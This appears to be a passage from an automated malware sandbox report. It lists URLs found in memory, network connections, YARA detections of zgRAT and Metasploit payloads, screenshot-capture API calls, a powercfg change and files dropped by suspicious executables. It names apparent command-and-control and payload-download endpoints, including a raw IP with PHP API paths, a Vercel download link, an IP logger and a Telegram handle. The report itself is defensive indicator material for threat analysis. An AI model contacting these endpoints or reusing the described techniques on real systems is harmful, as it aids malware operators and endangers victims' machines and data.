Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E38000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.133.61.172/7O
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000DCA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.133.61.172/api/crazyfish.php
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003D9D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.133.61.172/api/twofish.php
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.133.61.172/api/twofish.php(
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E0D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.133.61.172/api/twofish.php:
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.133.61.172/l
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E0D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.133.61.172:80/api/crazyfish.php
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E0D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.133.61.172:80/api/twofish.php
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.133.61.172:80/api/twofish.php_
Source: DSN_5xuwaC5nkP_MHzd7lLTl.exe, 0000000A.00000002.2613302475.0000000004295000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://gacan.zapto.org_DEBUG.zip/c
Source: m9GWTeQylsPUCcnTEkTCS8lf.exe, 0000000C.00000000.2388267970.0000000001344000.00000008.00000001.01000000.00000012.sdmp, m9GWTeQylsPUCcnTEkTCS8lf.exe, 0000000C.00000002.2664396294.000000000134D000.00000008.00000001.01000000.00000012.sdmp String found in binary or memory: http://html4/loose.dtd
Source: FileApp.exe, 00000000.00000002.2120455815.0000000004221000.00000004.00000800.00020000.00000000.sdmp, B4LiZFzJ_IAKzmYhwI_ve0Iy.exe, 00000009.00000002.2600221718.00000000040E9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: RegAsm.exe String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: FileApp.exe, 00000000.00000002.2120455815.0000000004221000.00000004.00000800.00020000.00000000.sdmp, FileApp.exe, 00000000.00000002.2120455815.0000000004FD3000.00000004.00000800.00020000.00000000.sdmp, FileApp.exe, 00000000.00000002.2120455815.0000000004C21000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2419695402.000000000056B000.00000040.00000400.00020000.00000000.sdmp, B4LiZFzJ_IAKzmYhwI_ve0Iy.exe, 00000009.00000002.2600221718.00000000040E9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.winimage.com/zLibDll
Source: B4LiZFzJ_IAKzmYhwI_ve0Iy.exe, 00000009.00000002.2600221718.00000000040E9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.winimage.com/zLibDllm_object
Source: B4LiZFzJ_IAKzmYhwI_ve0Iy.exe, 00000009.00000002.2600221718.00000000040E9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.datamarket.azure.com/data.ashx/
Source: xNc0eiwaHinah8TaPUA3TuXZ.exe, 00000008.00000002.2611175093.00000000033C5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ip.sb/ip
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000DCA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api64.ipify.org/
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E24000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2422723030.0000000000DCA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api64.ipify.org/?format=json
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E24000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api64.ipify.org:443/?format=json
Source: BitLockerToGo.exe, 00000025.00000002.2666627496.00000000031B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://condedqpwqm.shop/api)M
Source: m9GWTeQylsPUCcnTEkTCS8lf.exe, 0000000C.00000000.2387075578.0000000000C3A000.00000002.00000001.01000000.00000012.sdmp String found in binary or memory: https://datalake.azure.net/https://api.loganalytics.iohttps://graph.microsoft.us/https://api.loganal
Source: FileApp.exe, 00000000.00000002.2120455815.0000000004221000.00000004.00000800.00020000.00000000.sdmp, B4LiZFzJ_IAKzmYhwI_ve0Iy.exe, 00000009.00000002.2600221718.00000000040E9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://datamarket.azure.com/embedded/catalog?client_id=
Source: FileApp.exe, 00000000.00000002.2120455815.0000000004221000.00000004.00000800.00020000.00000000.sdmp, B4LiZFzJ_IAKzmYhwI_ve0Iy.exe, 00000009.00000002.2600221718.00000000040E9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://datamarket.azure.com/embedded/consent?client_id=
Source: FileApp.exe, 00000000.00000002.2120455815.0000000004221000.00000004.00000800.00020000.00000000.sdmp, B4LiZFzJ_IAKzmYhwI_ve0Iy.exe, 00000009.00000002.2600221718.00000000040E9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://datamarket.azure.com/embedded/query?client_id=
Source: FileApp.exe, 00000000.00000002.2120455815.0000000004221000.00000004.00000800.00020000.00000000.sdmp, B4LiZFzJ_IAKzmYhwI_ve0Iy.exe, 00000009.00000002.2600221718.00000000040E9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://datamarket.azure.com/embedded/resultrhttps://datamarket.accesscontrol.windows.net/v2/OAuth2-
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003D49000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://file-link-iota.vercel.app/
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003D49000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://file-link-iota.vercel.app/4
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E38000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2425361902.0000000003D9D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2422723030.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://file-link-iota.vercel.app/download
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://file-link-iota.vercel.app/downloadC:
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://file-link-iota.vercel.app/downloadT
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003D9D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://file-link-iota.vercel.app/downloadU
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://file-link-iota.vercel.app/downloadd
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003D9D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://file-link-iota.vercel.app:80/download
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://file-link-iota.vercel.app:80/downloadynamic
Source: l6BAwR4854FJ5LVXvo8GWfAt.exe, 00000006.00000000.2385160822.0000000000BB2000.00000002.00000001.01000000.0000000B.sdmp String found in binary or memory: https://github.com/dotnet/wpf
Source: m9GWTeQylsPUCcnTEkTCS8lf.exe, 0000000C.00000000.2387075578.0000000000C3A000.00000002.00000001.01000000.00000012.sdmp String found in binary or memory: https://github.com/go-sql-driver/mysql/wiki/old_passwords0001020304050607080910111213141516171819202
Source: m9GWTeQylsPUCcnTEkTCS8lf.exe, 0000000C.00000000.2387075578.0000000000C3A000.00000002.00000001.01000000.00000012.sdmp String found in binary or memory: https://github.com/go-sql-driver/mysql/wiki/strict-modepkcs7:
Source: m9GWTeQylsPUCcnTEkTCS8lf.exe, 0000000C.00000000.2387075578.0000000000C3A000.00000002.00000001.01000000.00000012.sdmp String found in binary or memory: https://github.com/golang/protobuf/issues/1609):
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/Mozilla/5.0
Source: FileApp.exe, 00000000.00000002.2120455815.0000000004221000.00000004.00000800.00020000.00000000.sdmp, FileApp.exe, 00000000.00000002.2120455815.0000000004FD3000.00000004.00000800.00020000.00000000.sdmp, FileApp.exe, 00000000.00000002.2120455815.0000000004C21000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2419695402.000000000056B000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/https://ipgeolocation.io/::
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E38000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/widget/demo/8.46.123.33
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E38000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/widget/demo/8.46.123.33EK
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E38000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/widget/demo/8.46.123.33R
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io:443/widget/demo/8.46.123.33
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003D5C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2425361902.0000000003D9D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://iplogger.org/
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003D5C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://iplogger.org/-
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003DCE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://iplogger.org/1nhuM4.js
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://iplogger.org/1nhuM4.js4
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003D9D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://iplogger.org/X~
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://iplogger.org:443/1nhuM4.jsrosoft
Source: m9GWTeQylsPUCcnTEkTCS8lf.exe, 0000000C.00000000.2387075578.0000000000C3A000.00000002.00000001.01000000.00000012.sdmp String found in binary or memory: https://manage.windowsazure.com/publishsettings/indextls:
Source: m9GWTeQylsPUCcnTEkTCS8lf.exe, 0000000C.00000000.2387075578.0000000000C3A000.00000002.00000001.01000000.00000012.sdmp String found in binary or memory: https://manage.windowsazure.us/publishsettings/indexcrypto/rsa:
Source: DSN_5xuwaC5nkP_MHzd7lLTl.exe, 0000000A.00000002.2613302475.0000000004295000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199768374681
Source: DSN_5xuwaC5nkP_MHzd7lLTl.exe, 0000000A.00000002.2613302475.0000000004295000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199768374681i11ihttps://t.me/edm0dMozilla/5.0
Source: DSN_5xuwaC5nkP_MHzd7lLTl.exe, 0000000A.00000002.2613302475.0000000004295000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://t.me/edm0d
Source: m9GWTeQylsPUCcnTEkTCS8lf.exe, 0000000C.00000000.2387075578.0000000000C3A000.00000002.00000001.01000000.00000012.sdmp String found in binary or memory: https://vault.azure.net/mysql.database.azure.comhttps://cosmos.azure.comSetConsoleCursorPositionstre
Source: m9GWTeQylsPUCcnTEkTCS8lf.exe, 0000000C.00000000.2387075578.0000000000C3A000.00000002.00000001.01000000.00000012.sdmp String found in binary or memory: https://vault.azure.netusgovtrafficmanager.netvault.usgovcloudapi.nethttps://vault.azure.cn/vault.mi
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003D9D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtransfer.net/
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003D9D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtransfer.net/EO
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003DCE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtransfer.net/V
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003D9D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2425361902.0000000003D88000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtransfer.net/handler/download?action=download&download_id=uuVCUDm6&private_id=cb726802f5f
Source: unknown Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53024
Source: unknown Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53045
Source: unknown Network traffic detected: HTTP traffic on port 53038 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53036 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53045 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown Network traffic detected: HTTP traffic on port 53041 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown Network traffic detected: HTTP traffic on port 53024 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53036
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53035
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53039
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53038
Source: unknown Network traffic detected: HTTP traffic on port 53035 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53044
Source: unknown Network traffic detected: HTTP traffic on port 53039 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53041
Source: unknown Network traffic detected: HTTP traffic on port 53044 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown HTTPS traffic detected: 104.237.62.213:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknown HTTPS traffic detected: 76.76.21.98:443 -> 192.168.2.6:49725 version: TLS 1.2
Source: unknown HTTPS traffic detected: 158.69.225.124:443 -> 192.168.2.6:49727 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.2.46:443 -> 192.168.2.6:53024 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:53035 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.146.35:443 -> 192.168.2.6:53036 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.146.35:443 -> 192.168.2.6:53038 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.146.35:443 -> 192.168.2.6:53039 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.146.35:443 -> 192.168.2.6:53041 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.146.35:443 -> 192.168.2.6:53044 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.146.35:443 -> 192.168.2.6:53045 version: TLS 1.2
Contains functionality to record screenshots
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_00418AB0 GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GlobalFix,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow, 22_2_00418AB0
Drops certificate files (DER)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Temp\TmpFE44.tmp Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Temp\Tmp142.tmp Jump to dropped file

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 23.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 5.2.ZYgCMtJP3wxddinn5Sa3IKJH.exe.40e5570.0.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 5.2.ZYgCMtJP3wxddinn5Sa3IKJH.exe.40e5570.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 0000000B.00000002.2733299099.0000000001980000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: 0000000C.00000002.2767261547.000000000264A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: 0000000B.00000002.2733299099.0000000001AD4000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Uses powercfg.exe to modify the power settings
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Code function: 14_2_00403899 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx, 14_2_00403899
Creates files inside the system directory
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe File created: C:\Windows\SunriseColeman
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Detected potential crypto function
Source: C:\Users\user\Desktop\FileApp.exe Code function: 0_2_030A7AD7 0_2_030A7AD7
Source: C:\Users\user\Desktop\FileApp.exe Code function: 0_2_030A7AE0 0_2_030A7AE0
Source: C:\Users\user\Desktop\FileApp.exe Code function: 0_2_05816158 0_2_05816158
Source: C:\Users\user\Desktop\FileApp.exe Code function: 0_2_05817030 0_2_05817030
Source: C:\Users\user\Desktop\FileApp.exe Code function: 0_2_05819DDA 0_2_05819DDA
Source: C:\Users\user\Desktop\FileApp.exe Code function: 0_2_0581DF58 0_2_0581DF58
Source: C:\Users\user\Desktop\FileApp.exe Code function: 0_2_05913DB8 0_2_05913DB8
Source: C:\Users\user\Desktop\FileApp.exe Code function: 0_2_05917990 0_2_05917990
Source: C:\Users\user\Desktop\FileApp.exe Code function: 0_2_05910040 0_2_05910040
Source: C:\Users\user\Desktop\FileApp.exe Code function: 0_2_05912AD0 0_2_05912AD0
Source: C:\Users\user\Desktop\FileApp.exe Code function: 0_2_05913DA8 0_2_05913DA8
Source: C:\Users\user\Desktop\FileApp.exe Code function: 0_2_05914F10 0_2_05914F10
Source: C:\Users\user\Desktop\FileApp.exe Code function: 0_2_05914F20 0_2_05914F20
Source: C:\Users\user\Desktop\FileApp.exe Code function: 0_2_05919690 0_2_05919690
Source: C:\Users\user\Desktop\FileApp.exe Code function: 0_2_05916680 0_2_05916680
Source: C:\Users\user\Desktop\FileApp.exe Code function: 0_2_05916640 0_2_05916640
Source: C:\Users\user\Desktop\FileApp.exe Code function: 0_2_0591967F 0_2_0591967F
Source: C:\Users\user\Desktop\FileApp.exe Code function: 0_2_05917981 0_2_05917981
Source: C:\Users\user\Desktop\FileApp.exe Code function: 0_2_0591C89C 0_2_0591C89C
Source: C:\Users\user\Desktop\FileApp.exe Code function: 0_2_05910006 0_2_05910006
Source: C:\Users\user\Desktop\FileApp.exe Code function: 0_2_05912ACB 0_2_05912ACB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0049A110 2_2_0049A110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0042C1F0 2_2_0042C1F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00436230 2_2_00436230
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_004302C0 2_2_004302C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_004B0330 2_2_004B0330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_004424E0 2_2_004424E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_004BA530 2_2_004BA530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00508650 2_2_00508650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00434690 2_2_00434690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0047E8A0 2_2_0047E8A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_004348B0 2_2_004348B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00440A90 2_2_00440A90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00496BB0 2_2_00496BB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_004B6D20 2_2_004B6D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00426D90 2_2_00426D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_004BCDB0 2_2_004BCDB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_004CF160 2_2_004CF160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00481170 2_2_00481170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0046D250 2_2_0046D250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00431360 2_2_00431360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00451300 2_2_00451300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_004213A0 2_2_004213A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00437680 2_2_00437680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00433760 2_2_00433760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0049DA80 2_2_0049DA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00402100 2_2_00402100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0042A1E0 2_2_0042A1E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00516190 2_2_00516190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_005121A0 2_2_005121A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_004242B0 2_2_004242B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00422640 2_2_00422640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00402630 2_2_00402630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0044A710 2_2_0044A710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_005427C0 2_2_005427C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_005667ED 2_2_005667ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0042C8E0 2_2_0042C8E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0041E9E0 2_2_0041E9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00440FF0 2_2_00440FF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0054D02A 2_2_0054D02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_004210E0 2_2_004210E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00543169 2_2_00543169
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0042D100 2_2_0042D100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_004432C0 2_2_004432C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_005612E0 2_2_005612E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00423470 2_2_00423470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0055F4DA 2_2_0055F4DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0040B5E0 2_2_0040B5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00405640 2_2_00405640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_004BF7C0 2_2_004BF7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0054F7F8 2_2_0054F7F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00421820 2_2_00421820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00425820 2_2_00425820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00551830 2_2_00551830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0042D8B0 2_2_0042D8B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00561EFC 2_2_00561EFC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00401E90 2_2_00401E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00515F95 2_2_00515F95
Source: C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe Code function: 6_2_01782DD0 6_2_01782DD0
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Code function: 9_2_0136A180 9_2_0136A180
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Code function: 9_2_0136A0A8 9_2_0136A0A8
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Code function: 9_2_0136A3D2 9_2_0136A3D2
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Code function: 9_2_0136A3D8 9_2_0136A3D8
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Code function: 9_2_056E94C0 9_2_056E94C0
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Code function: 9_2_056EE710 9_2_056EE710
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Code function: 9_2_056E56D0 9_2_056E56D0
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Code function: 9_2_056E81C0 9_2_056E81C0
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Code function: 9_2_056E15A8 9_2_056E15A8
